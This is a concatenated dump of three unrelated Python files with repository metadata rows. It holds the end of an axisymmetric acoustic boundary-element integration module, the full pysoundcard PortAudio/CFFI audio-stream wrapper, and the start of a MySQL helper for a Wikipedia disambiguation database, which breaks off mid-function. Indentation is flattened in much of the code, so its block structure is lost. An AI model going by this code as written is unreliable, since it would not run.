circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
return -np.dot(rr, vec_q3) / (norm(rr) * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
return (1j * k * RR - 1.0) * np.exp(1j * k * RR) * np.dot(rr, vec_q3) / (RR * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
return 0.0
def ComputeMt(k, p, vecp, qa, qb, pOnElement):
qab = qb - qa
    # subdivided circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
                dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
return dotRnP / (norm(rr) * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
return -(1j * k * RR - 1.0) * np.exp(1j * k * RR) * dotRnP / (RR * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
if pOnElement:
return ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
return ComplexQuad(generatorFunc, qa, qb)
def ComputeN(k, p, vecp, qa, qb, pOnElement):
qab = qb - qa
vec_q = Normal2D(qa, qb)
    # subdivided circular integral into sections of
# similar size as qab
q = 0.5 * (qa + qb)
nSections = 1 + int(q[0] * np.pi / norm(qab))
if pOnElement:
if k == 0.0:
vecp3 = np.array([vecp[0], 0.0, vecp[1]], dtype=np.float32)
def coneFunc(x, direction):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.sqrt(0.5) * np.array([x[0], x[1], direction], dtype=np.float32)
dnpnq = np.dot(vecp3, vec_q3)
rr = q3 - p3
RR = norm(rr)
dotRNP = np.dot(rr, vecp3)
dotRNQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRNP * dotRNQ / np.dot(rr, rr)
return (dnpnq + 3.0 * RNPRNQ) / (RR * np.dot(rr, rr))
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
lenAB = norm(qab)
# deal with the cone at the qa side of the generator
direction = np.sign(qa[1] - qb[1])
if direction == 0.0:
direction = 1.0
tip_a = np.array([0.0, qa[1] + direction * qa[0]], dtype=np.float32)
nConeSectionsA = int(qa[0] * np.sqrt(2.0) / lenAB) + 1
coneValA = ComplexQuadCone(lambda x: coneFunc(x, direction), qa, tip_a, nConeSectionsA)
# deal with the cone at the qb side of the generator
direction = np.sign(qb[1] - qa[1])
if direction == 0.0:
direction = -1.0
tip_b = np.array([0.0, qb[1] + direction * qb[0]], dtype=np.float32)
nConeSectionsB = int(qb[0] * np.sqrt(2.0) / lenAB) + 1
coneValB = ComplexQuadCone(lambda x: coneFunc(x, direction), qb, tip_b, nConeSectionsB)
return -(coneValA + coneValB)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
DNPNQ = vecp[0] * vec_q3[0] + vecp[1] * vec_q3[2]
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
dotRnQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRnP * dotRnQ / np.dot(rr, rr)
RNPNQ = -(DNPNQ + RNPRNQ) / RR
IKR = 1j * k * RR
FPG0 = 1.0 / RR
FPGR = np.exp(IKR) / np.dot(rr, rr) * (IKR - 1.0)
FPGR0 = -1.0 / np.dot(rr, rr)
FPGRR = np.exp(IKR) * (2.0 - 2.0 * IKR - (k*RR)**2) / (RR * np.dot(rr, rr))
FPGRR0 = 2.0 / (RR * np.dot(rr, rr))
return (FPGR - FPGR0) * RNPNQ + (FPGRR - FPGRR0) * RNPRNQ \
+ k**2 * FPG0 / 2.0
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComputeN(0.0, p, vecp, qa, qb, True) - k**2 * ComputeL(0.0, p, qa, qb, True) / 2.0 \
+ ComplexQuad(generatorFunc, qa, p) + ComplexQuad(generatorFunc, p, qb)
else:
if k == 0.0:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
DNPNQ = vecp[0] * vec_q3[0] + vecp[1] * vec_q3[2]
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
dotRnQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRnP * dotRnQ / np.dot(rr, rr)
RNPNQ = -(DNPNQ + RNPRNQ) / RR
IKR = 1j * k * RR
FPGR = -1.0 / np.dot(rr, rr)
FPGRR = 2.0 / (RR * np.dot(rr, rr))
return FPGR * RNPNQ + FPGRR * RNPRNQ
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
else:
def generatorFunc(x):
circle = CircularIntegratorPi(nSections)
r = x[0]
z = x[1]
p3 = np.array([p[0], 0.0, p[1]], dtype=np.float32)
def circleFunc(x):
q3 = np.array([r * x[0], r * x[1], z], dtype=np.float32)
vec_q3 = np.array([vec_q[0] * x[0], vec_q[0] * x[1], vec_q[1]], dtype=np.float32)
rr = q3 - p3
RR = norm(rr)
DNPNQ = vecp[0] * vec_q3[0] + vecp[1] * vec_q3[2]
dotRnP = vecp[0] * rr[0] + vecp[1] * rr[2]
dotRnQ = -np.dot(rr, vec_q3)
RNPRNQ = dotRnP * dotRnQ / np.dot(rr, rr)
RNPNQ = -(DNPNQ + RNPRNQ) / RR
IKR = 1j * k * RR
FPGR = np.exp(IKR) / np.dot(rr, rr) * (IKR - 1.0)
FPGRR = np.exp(IKR) * (2.0 - 2.0 * IKR - (k*RR)**2) / (RR * np.dot(rr, rr))
return FPGR * RNPNQ + FPGRR * RNPRNQ
return circle.integrate(circleFunc) * r / (2.0 * np.pi)
return ComplexQuad(generatorFunc, qa, qb)
| gpl-3.0 | -5,642,675,042,839,800,000 | 38.92 | 110 | 0.48353 | false |
bastibe/PySoundCard | pysoundcard.py | 1 | 26373 | import sys
import os
from cffi import FFI
import atexit
import numpy as np
import warnings
"""PySoundCard is an audio library based on PortAudio, CFFI and NumPy
PySoundCard can play and record audio data. Audio devices are supported
through PortAudio[1], which is a free, cross-platform, open-source
audio I/O library that runs on many platforms including Windows, OS X,
and Unix (OSS/ALSA). It is accessed through CFFI[2], which is a
foreign function interface for Python calling C code. CFFI is
supported for CPython 2.6+, 3.x and PyPy 2.0+. PySoundCard represents
audio data as NumPy arrays.
PySoundCard is inspired by PyAudio[3]. Its main difference is that it
uses CFFI instead of a CPython extension and tries to implement a more
pythonic interface. Its performance characteristics are very similar.
[1]: http://www.portaudio.com/
[2]: http://cffi.readthedocs.org/
[3]: http://people.csail.mit.edu/hubert/pyaudio/
The basic building blocks of audio input/output in PySoundCard are
streams. Streams represent sound cards, both for audio playback and
recording. Every stream has a sample rate, a block size, an input
device and/or an output device.
There are two modes of operation for streams: read/write and callback
mode.
In read/write mode, two methods are used to play/record audio: For
playback, you write to a stream. For recording, you read from a
stream. You can read/write up to one block of audio data to a stream
without having to wait for it to play.
In callback mode, a callback function is defined, which will be called
asynchronously whenever there is a new block of audio data available
to read or write. The callback function must then provide/consume one
block of audio data.
A stream can be either full duplex (both input and output) or half
duplex (either input or output). This is determined by specifying one
or two devices for the stream. Both devices must be part of the same
audio API.
Use the function apis() to get a list of all available apis. Use the
function devices() to get a list of all available devices. There are
additional functions to get the default devices and api. If a stream
is created without specifying a device, the default devices are used.
Both devices and apis are simple dictionaries that contain information
and configuration options. Many device options can be changed simply
by modifying the dictionary before passing it to the stream
constructor. This includes the number of channels, the desired
latency, and the audio data format.
PySoundCard is BSD licensed.
(c) 2013, Bastian Bechtold
"""
__version__ = "0.5.2"
ffi = FFI()
ffi.cdef("""
typedef int PaError;
typedef enum PaErrorCode
{
paNoError = 0,
paNotInitialized = -10000,
paUnanticipatedHostError,
paInvalidChannelCount,
paInvalidSampleRate,
paInvalidDevice,
paInvalidFlag,
paSampleFormatNotSupported,
paBadIODeviceCombination,
paInsufficientMemory,
paBufferTooBig,
paBufferTooSmall,
paNullCallback,
paBadStreamPtr,
paTimedOut,
paInternalError,
paDeviceUnavailable,
paIncompatibleHostApiSpecificStreamInfo,
paStreamIsStopped,
paStreamIsNotStopped,
paInputOverflowed,
paOutputUnderflowed,
paHostApiNotFound,
paInvalidHostApi,
paCanNotReadFromACallbackStream,
paCanNotWriteToACallbackStream,
paCanNotReadFromAnOutputOnlyStream,
paCanNotWriteToAnInputOnlyStream,
paIncompatibleStreamHostApi,
paBadBufferPtr
} PaErrorCode;
PaError Pa_Initialize(void);
PaError Pa_Terminate(void);
int Pa_GetVersion(void);
const char *Pa_GetVersionText(void);
typedef int PaDeviceIndex;
typedef enum PaHostApiTypeId
{
paInDevelopment=0, /* use while developing support for a new host API */
paDirectSound=1,
paMME=2,
paASIO=3,
paSoundManager=4,
paCoreAudio=5,
paOSS=7,
paALSA=8,
paAL=9,
paBeOS=10,
paWDMKS=11,
paJACK=12,
paWASAPI=13,
paAudioScienceHPI=14
} PaHostApiTypeId;
typedef struct PaHostApiInfo {
int structVersion;
enum PaHostApiTypeId type;
const char *name;
int deviceCount;
PaDeviceIndex defaultInputDevice;
PaDeviceIndex defaultOutputDevice;
} PaHostApiInfo;
typedef int PaHostApiIndex;
PaHostApiIndex Pa_GetHostApiCount();
const PaHostApiInfo *Pa_GetHostApiInfo(PaHostApiIndex);
typedef double PaTime;
typedef struct PaDeviceInfo {
int structVersion;
const char *name;
PaHostApiIndex hostApi;
int maxInputChannels;
int maxOutputChannels;
PaTime defaultLowInputLatency;
PaTime defaultLowOutputLatency;
PaTime defaultHighInputLatency;
PaTime defaultHighOutputLatency;
double defaultSampleRate;
} PaDeviceInfo;
PaDeviceIndex Pa_GetDeviceCount(void);
const PaDeviceInfo *Pa_GetDeviceInfo(PaDeviceIndex);
PaHostApiIndex Pa_GetDefaultHostApi(void);
PaDeviceIndex Pa_GetDefaultInputDevice(void);
PaDeviceIndex Pa_GetDefaultOutputDevice(void);
const char *Pa_GetErrorText(PaError);
typedef void PaStream;
typedef unsigned long PaSampleFormat;
typedef struct PaStreamParameters {
PaDeviceIndex device;
int channelCount;
PaSampleFormat sampleFormat;
PaTime suggestedLatency;
void *hostApiSpecificStreamInfo;
} PaStreamParameters;
typedef unsigned long PaStreamFlags;
typedef struct PaStreamCallbackTimeInfo{
PaTime inputBufferAdcTime;
PaTime currentTime;
PaTime outputBufferDacTime;
} PaStreamCallbackTimeInfo;
typedef unsigned long PaStreamCallbackFlags;
typedef int PaStreamCallback(const void*, void*, unsigned long,
const PaStreamCallbackTimeInfo*,
PaStreamCallbackFlags, void*);
typedef void PaStreamFinishedCallback(void*);
typedef struct PaStreamInfo {
int structVersion;
PaTime inputLatency;
PaTime outputLatency;
double sampleRate;
} PaStreamInfo;
PaError Pa_OpenStream(PaStream**, const PaStreamParameters*,
const PaStreamParameters*, double,
unsigned long, PaStreamFlags,
PaStreamCallback*, void*);
PaError Pa_CloseStream (PaStream*);
PaError Pa_SetStreamFinishedCallback(PaStream*, PaStreamFinishedCallback*);
PaError Pa_StartStream (PaStream*);
PaError Pa_StopStream (PaStream*);
PaError Pa_AbortStream (PaStream*);
PaError Pa_IsStreamStopped (PaStream*);
PaError Pa_IsStreamActive (PaStream*);
const PaStreamInfo *Pa_GetStreamInfo (PaStream*);
PaTime Pa_GetStreamTime (PaStream*);
double Pa_GetStreamCpuLoad (PaStream*);
PaError Pa_ReadStream (PaStream*, void*, unsigned long);
PaError Pa_WriteStream (PaStream*, const void*, unsigned long);
signed long Pa_GetStreamReadAvailable (PaStream*);
signed long Pa_GetStreamWriteAvailable (PaStream*);
PaError Pa_GetSampleSize (PaSampleFormat);
void Pa_Sleep (long);
""")
continue_flag = 0
complete_flag = 1
abort_flag = 2
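# continue_flag, complete_flag and abort_flag mirror PortAudio's paContinue,
# paComplete and paAbort callback return codes; _np2pa below maps NumPy dtypes
# to the corresponding PortAudio sample format flags (paFloat32, paInt32,
# paInt16, paInt8, paUInt8).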
_np2pa = {
np.dtype('float32'): 0x01,
np.dtype('int32'): 0x02,
np.dtype('int16'): 0x08,
np.dtype('int8'): 0x10,
np.dtype('uint8'): 0x20
}
try:
_pa = ffi.dlopen('portaudio')
except OSError as err:
if sys.platform == 'darwin':
libname = 'portaudio.dylib'
elif sys.platform == 'win32':
from platform import architecture as _architecture
libname = 'portaudio' + _architecture()[0] + '.dll'
else:
raise
_pa = ffi.dlopen(os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'_soundcard_data', libname))
_pa.Pa_Initialize()
atexit.register(_pa.Pa_Terminate)
def hostapi_info(index=None):
"""Return a generator with information about each host API.
If index is given, only one dictionary for the given host API is
returned.
"""
if index is None:
return (hostapi_info(i) for i in range(_pa.Pa_GetHostApiCount()))
else:
info = _pa.Pa_GetHostApiInfo(index)
if not info:
raise RuntimeError("Invalid host API")
assert info.structVersion == 1
return {'name': ffi.string(info.name).decode(errors='ignore'),
'default_input_device': info.defaultInputDevice,
'default_output_device': info.defaultOutputDevice}
def device_info(index=None):
"""Return a generator with information about each device.
If index is given, only one dictionary for the given device is
returned.
"""
if index is None:
return (device_info(i) for i in range(_pa.Pa_GetDeviceCount()))
else:
info = _pa.Pa_GetDeviceInfo(index)
if not info:
raise RuntimeError("Invalid device")
assert info.structVersion == 2
if 'DirectSound' in hostapi_info(info.hostApi)['name']:
enc = 'mbcs'
else:
enc = 'utf-8'
return {'name': ffi.string(info.name).decode(encoding=enc,
errors='ignore'),
'hostapi': info.hostApi,
'max_input_channels': info.maxInputChannels,
'max_output_channels': info.maxOutputChannels,
'default_low_input_latency': info.defaultLowInputLatency,
'default_low_output_latency': info.defaultLowOutputLatency,
'default_high_input_latency': info.defaultHighInputLatency,
'default_high_output_latency': info.defaultHighOutputLatency,
'default_samplerate': info.defaultSampleRate}
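# For illustration, a hedged sketch of typical use (assumes at least one
# audio device is present):
#
#     for dev in device_info():
#         print(dev['name'], dev['max_input_channels'], dev['max_output_channels'])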
def default_hostapi():
"""Return default host API index."""
return _pa.Pa_GetDefaultHostApi()
def default_input_device():
"""Return default input device index."""
idx = _pa.Pa_GetDefaultInputDevice()
if idx < 0:
raise RuntimeError("No default input device available")
return idx
def default_output_device():
"""Return default output device index."""
idx = _pa.Pa_GetDefaultOutputDevice()
if idx < 0:
raise RuntimeError("No default output device available")
return idx
def pa_version():
"""Returns the version information about the portaudio library."""
return (_pa.Pa_GetVersion(), ffi.string(_pa.Pa_GetVersionText()).decode())
class _StreamBase(object):
"""Base class for Stream, InputStream and OutputStream."""
def __init__(self, iparameters, oparameters, samplerate, blocksize,
callback_wrapper, finished_callback,
clip_off=False, dither_off=False, never_drop_input=False,
prime_output_buffers_using_stream_callback=False):
stream_flags = 0x0
if clip_off:
stream_flags |= 0x00000001
if dither_off:
stream_flags |= 0x00000002
if never_drop_input:
stream_flags |= 0x00000004
if prime_output_buffers_using_stream_callback:
stream_flags |= 0x00000008
if callback_wrapper:
self._callback = ffi.callback(
"PaStreamCallback", callback_wrapper, error=abort_flag)
else:
self._callback = ffi.NULL
self._stream = ffi.new("PaStream**")
err = _pa.Pa_OpenStream(self._stream, iparameters, oparameters,
samplerate, blocksize, stream_flags,
self._callback, ffi.NULL)
self._handle_error(err)
# dereference PaStream** --> PaStream*
self._stream = self._stream[0]
# set some stream information
self.blocksize = blocksize
info = _pa.Pa_GetStreamInfo(self._stream)
if not info:
raise RuntimeError("Could not obtain stream info!")
self.samplerate = info.sampleRate
if not oparameters:
self.latency = info.inputLatency
elif not iparameters:
self.latency = info.outputLatency
else:
self.latency = info.inputLatency, info.outputLatency
if finished_callback:
def finished_callback_wrapper(_):
return finished_callback()
self._finished_callback = ffi.callback(
"PaStreamFinishedCallback", finished_callback_wrapper)
err = _pa.Pa_SetStreamFinishedCallback(self._stream,
self._finished_callback)
self._handle_error(err)
# Avoid confusion if something goes wrong before assigning self._stream:
_stream = ffi.NULL
def _handle_error(self, err):
# all error codes are negative:
if err >= 0:
return err
errstr = ffi.string(_pa.Pa_GetErrorText(err)).decode()
if err == -9981 or err == -9980:
            # InputOverflowed and OutputUnderflowed are non-fatal:
warnings.warn("%.4f: %s" % (self.time(), errstr),
RuntimeWarning, stacklevel=2)
return err
else:
raise RuntimeError("%.4f: %s" % (self.time(), errstr))
def __del__(self):
# Close stream at garbage collection
self.close()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, tb):
self.stop()
self.close()
def start(self):
"""Commence audio processing.
If successful, the stream is considered active.
"""
err = _pa.Pa_StartStream(self._stream)
if err == _pa.paStreamIsNotStopped:
return
self._handle_error(err)
def stop(self):
"""Terminate audio processing.
This waits until all pending audio buffers have been played
before it returns. If successful, the stream is considered
inactive.
"""
err = _pa.Pa_StopStream(self._stream)
if err == _pa.paStreamIsStopped:
return
self._handle_error(err)
def abort(self):
"""Terminate audio processing immediately.
This does not wait for pending audio buffers. If successful,
the stream is considered inactive.
"""
err = _pa.Pa_AbortStream(self._stream)
if err == _pa.paStreamIsStopped:
return
self._handle_error(err)
def close(self):
"""Close the stream.
Can be called multiple times.
        If the audio stream is active, any pending buffers are discarded
as if abort() had been called.
"""
_pa.Pa_CloseStream(self._stream)
# There might be errors if _pa.Pa_Terminate() has been called
# already or if the stream has been closed before.
# Those errors are ignored here, it's too late anyway ...
def is_active(self):
"""Determine whether the stream is active.
A stream is active after a successful call to start(). It
        becomes inactive as a result of a call to stop() or abort(), or of
        a return value other than continue from the stream callback.
"""
return self._handle_error(_pa.Pa_IsStreamActive(self._stream)) == 1
def is_stopped(self):
"""Determine whether a stream is stopped.
A stream is stopped before the first call to start() and after
a successful call to stop() or abort(). If the stream callback
returns a value other than continue, the stream is NOT
considered stopped.
"""
return self._handle_error(_pa.Pa_IsStreamStopped(self._stream)) == 1
def time(self):
"""Returns the current stream time in seconds.
This is the same time that is given to the stream callback. It
is monotonically increasing and is not affected by starting or
stopping the stream. This time may be used for synchronizing
other events to the audio stream.
"""
return _pa.Pa_GetStreamTime(self._stream)
def cpu_load(self):
"""Retrieve CPU usage information for the specified stream.
        Returns a floating point number between 0.0 and 1.0 that is the
        fraction of the total CPU time consumed by the stream callback's
        audio processing within portaudio. This excludes time spent in
        cffi and Python code. This function does not work with blocking
read/write streams.
"""
return _pa.Pa_GetStreamCpuLoad(self._stream)
class InputStream(_StreamBase):
"""Stream for recording only. See :class:`Stream`."""
def __init__(self, samplerate=None, blocksize=0,
device=None, channels=None, dtype='float32', latency=0,
callback=None, finished_callback=None, **flags):
parameters, self.dtype, samplerate = _get_stream_parameters(
'input', device, channels, dtype, latency, samplerate)
self.device = parameters.device
self.channels = parameters.channelCount
def callback_wrapper(iptr, optr, frames, time, status, _):
data = _frombuffer(iptr, frames, self.channels, self.dtype)
return callback(data, _time2dict(time), status)
_StreamBase.__init__(self, parameters, ffi.NULL, samplerate,
blocksize, callback and callback_wrapper,
finished_callback, **flags)
def read_length(self):
"""The number of frames that can be read without waiting."""
return _pa.Pa_GetStreamReadAvailable(self._stream)
def read(self, frames, raw=False):
"""Read samples from an input stream.
The function does not return until the required number of
frames has been read. This may involve waiting for the
operating system to supply the data.
If raw data is requested, the raw cffi data buffer is
returned. Otherwise, a numpy array of the appropriate dtype
with one column per channel is returned.
"""
channels, _ = _split(self.channels)
dtype, _ = _split(self.dtype)
data = ffi.new("signed char[]", channels * dtype.itemsize * frames)
self._handle_error(_pa.Pa_ReadStream(self._stream, data, frames))
if not raw:
data = np.frombuffer(ffi.buffer(data), dtype=dtype)
data.shape = frames, channels
return data
class OutputStream(_StreamBase):
"""Stream for playback only. See :class:`Stream`."""
def __init__(self, samplerate=None, blocksize=0,
device=None, channels=None, dtype='float32', latency=0,
callback=None, finished_callback=None, **flags):
parameters, self.dtype, samplerate = _get_stream_parameters(
'output', device, channels, dtype, latency, samplerate)
self.device = parameters.device
self.channels = parameters.channelCount
def callback_wrapper(iptr, optr, frames, time, status, _):
data = _frombuffer(optr, frames, self.channels, self.dtype)
return callback(data, _time2dict(time), status)
_StreamBase.__init__(self, ffi.NULL, parameters, samplerate,
blocksize, callback and callback_wrapper,
finished_callback, **flags)
def write_length(self):
"""The number of frames that can be written without waiting."""
return _pa.Pa_GetStreamWriteAvailable(self._stream)
def write(self, data):
"""Write samples to an output stream.
As much as one blocksize of audio data will be played
without blocking. If more than one blocksize was provided,
the function will only return when all but one blocksize
has been played.
Data will be converted to a numpy matrix. Multichannel data
should be provided as a (frames, channels) matrix. If the
data is provided as a 1-dim array, it will be treated as mono
data and will be played on all channels simultaneously. If the
data is provided as a 2-dim matrix and fewer tracks are
provided than channels, silence will be played on the missing
channels. Similarly, if more tracks are provided than there
are channels, the extraneous channels will not be played.
"""
frames = len(data)
_, channels = _split(self.channels)
_, dtype = _split(self.dtype)
if (not isinstance(data, np.ndarray) or data.dtype != dtype):
data = np.array(data, dtype=dtype)
if len(data.shape) == 1:
# play mono signals on all channels
data = np.tile(data, (channels, 1)).T
if data.shape[1] > channels:
data = data[:, :channels]
if data.shape < (frames, channels):
# if less data is available than requested, pad with zeros.
tmp = data
data = np.zeros((frames, channels), dtype=dtype)
data[:tmp.shape[0], :tmp.shape[1]] = tmp
data = data.ravel().tostring()
err = _pa.Pa_WriteStream(self._stream, data, frames)
self._handle_error(err)
class Stream(InputStream, OutputStream):
"""Streams handle audio input and output to your application.
Each stream operates at a specific sample rate with specific
sample formats and buffer sizes. Each stream can either be half
duplex (input only or output only) or full duplex (both input and
output). For full duplex operation, the input and output device
must use the same audio api.
Once a stream has been created, audio processing can be started
and stopped multiple times using start(), stop() and abort(). The
functions is_active() and is_stopped() can be used to check this.
The functions info(), time() and cpu_load() can be used to get
additional information about the stream.
Data can be read and written to the stream using read() and
write(). Use read_length() and write_length() to see how many
frames can be read or written at the current time.
Alternatively, a callback can be specified which is called
whenever there is data available to read or write.
"""
def __init__(self, samplerate=None, blocksize=0,
device=None, channels=None, dtype='float32', latency=0,
callback=None, finished_callback=None, **flags):
"""Open a new stream.
If no input or output device is specified, the
default input/output device is taken.
If a callback is given, it will be called whenever the stream
is active and data is available to read or write. If a
finished_callback is given, it will be called whenever the
stream is stopped or aborted. If a callback is given, read()
and write() should not be used.
The callback should have a signature like this:
callback(input, output, time, status) -> flag
where input is the recorded data as a NumPy array, output is
another NumPy array (with uninitialized content), where the data
for playback has to be written to (using indexing).
time is a dictionary with some timing information, and
status indicates whether input or output buffers have
been inserted or dropped to overcome underflow or overflow
conditions.
The function must return one of continue_flag, complete_flag or
abort_flag. complete_flag and abort_flag act as if stop() or
abort() had been called, respectively. continue_flag resumes
normal audio processing.
The finished_callback should be a function with no arguments
and no return values.
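        A minimal callback sketch (an illustrative example that assumes the
        stream was opened with the same number of input and output
        channels; it simply loops the input back to the output):
            def callback(input, output, time, status):
                output[:] = input
                return continue_flag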
"""
idevice, odevice = _split(device)
ichannels, ochannels = _split(channels)
idtype, odtype = _split(dtype)
ilatency, olatency = _split(latency)
iparameters, idtype, isamplerate = _get_stream_parameters(
'input', idevice, ichannels, idtype, ilatency, samplerate)
oparameters, odtype, osamplerate = _get_stream_parameters(
'output', odevice, ochannels, odtype, olatency, samplerate)
self.dtype = idtype, odtype
self.device = iparameters.device, oparameters.device
ichannels = iparameters.channelCount
ochannels = oparameters.channelCount
self.channels = ichannels, ochannels
if isamplerate != osamplerate:
raise RuntimeError(
"Input and output device must have the same samplerate")
else:
samplerate = isamplerate
def callback_wrapper(iptr, optr, frames, time, status, _):
idata = _frombuffer(iptr, frames, ichannels, idtype)
odata = _frombuffer(optr, frames, ochannels, odtype)
return callback(idata, odata, _time2dict(time), status)
_StreamBase.__init__(self, iparameters, oparameters, samplerate,
blocksize, callback and callback_wrapper,
finished_callback, **flags)
def _get_stream_parameters(kind, device, channels, dtype, latency, samplerate):
"""Generate PaStreamParameters struct."""
if device is None:
if kind == 'input':
device = _pa.Pa_GetDefaultInputDevice()
elif kind == 'output':
device = _pa.Pa_GetDefaultOutputDevice()
info = device_info(device)
if channels is None:
channels = info['max_' + kind + '_channels']
dtype = np.dtype(dtype)
try:
sample_format = _np2pa[dtype]
except KeyError:
raise ValueError("Invalid " + kind + " sample format")
if samplerate is None:
samplerate = info['default_samplerate']
parameters = ffi.new(
"PaStreamParameters*",
(device, channels, sample_format, latency, ffi.NULL))
return parameters, dtype, samplerate
def _frombuffer(ptr, frames, channels, dtype):
"""Create NumPy array from a pointer to some memory."""
framesize = channels * dtype.itemsize
data = np.frombuffer(ffi.buffer(ptr, frames * framesize), dtype=dtype)
data.shape = -1, channels
return data
def _time2dict(time):
"""Convert PaStreamCallbackTimeInfo struct to dict."""
return {'input_adc_time': time.inputBufferAdcTime,
'current_time': time.currentTime,
'output_dac_time': time.outputBufferDacTime}
def _split(value):
"""Split input/output value into two values."""
if isinstance(value, str):
# iterable, but not meant for splitting
return value, value
try:
invalue, outvalue = value
except TypeError:
invalue = outvalue = value
except ValueError:
raise ValueError("Only single values and pairs are allowed")
return invalue, outvalue
| bsd-3-clause | -7,574,350,281,367,325,000 | 33.701316 | 79 | 0.657339 | false |
plaufer/wikiwsd | wsd/database/mysqlbuildview.py | 1 | 7099 | import MySQLdb
import logging
import time
MYSQL_DEAD_LOCK_ERROR = 1213
class MySQLBuildView:
"""The MySQLBuildView class allows database access optimized to
build the disambiguation database
"""
def __init__(self, db_connection):
"""constructor
@param db_connector the database connector used to access the database
"""
self._db_connection = db_connection
self._cursor = db_connection.cursor()
self.reset_cache()
def __del__(self):
"""destructor
closes the database connection
"""
self._db_connection.close()
def insert_article(self, id, title):
"""saves an article in the database
@param id the id of the article
@param title the title of the article
"""
try:
self._cursor.execute('INSERT INTO articles(id, title) VALUES(%s, %s);',
(id, title))
except MySQLdb.Error, e:
logging.error('error saving article "%s" to database: %s (%d)'
% (title.encode('ascii', 'ignore'), e.args[1], e.args[0]))
def insert_redirect(self, source_name, target_name):
"""saves a redirect in the database
@param source_name the name of the source article
@param target_name the name of the target article
"""
try:
self._cursor.execute('INSERT INTO redirects(source_article_name, target_article_name) VALUES(%s, %s);',
(source_name, target_name))
except MySQLdb.Error, e:
logging.error('error saving redirect "%s" --> "%s" to database: %s (%d)'
% (source_name.encode('ascii', 'ignore'), target_name.encode('ascii', 'ignore'), e.args[1], e.args[0]))
def insert_link(self, source_article_id, target_article_name):
"""saves a link to the database and updates the article record it points to
@param source_article_id the id of the article which links to the target
@param target_article_name the name of the target article
@return the id of the referenced article or None if not found
"""
target_article_id = self._resolve_title(target_article_name)
if target_article_id == None:
logging.error('Could not resolve target article "%s" for link from source article %d'
% (target_article_name.encode('ascii', 'ignore'), source_article_id))
else:
try:
self._cursor.execute('INSERT INTO links(source_article_id, target_article_id) VALUES(%s, %s);',
(source_article_id, target_article_id))
except MySQLdb.Error, e:
logging.error('error saving link (%d) --> (%d) to database: %s (%d)'
% (source_article_id, target_article_id, e.args[1], e.args[0]))
return target_article_id
def insert_references(self, target_article_ids):
"""inserts references to update the linkincount field of the target article
@param target_article_ids array of the referenced articles
"""
retry = True
retryCount = 0
while retry and retryCount < 10:
try:
retryCount += 1
self._cursor.executemany('UPDATE articles SET articleincount=articleincount+1 WHERE id=%s;', target_article_ids)
retry = False
except MySQLdb.Error, e:
if e.args[0] == MYSQL_DEAD_LOCK_ERROR:
                    logging.warning('deadlock updating articleincount field. retrying... (%d)' % (retryCount))
time.sleep(0.05)
else:
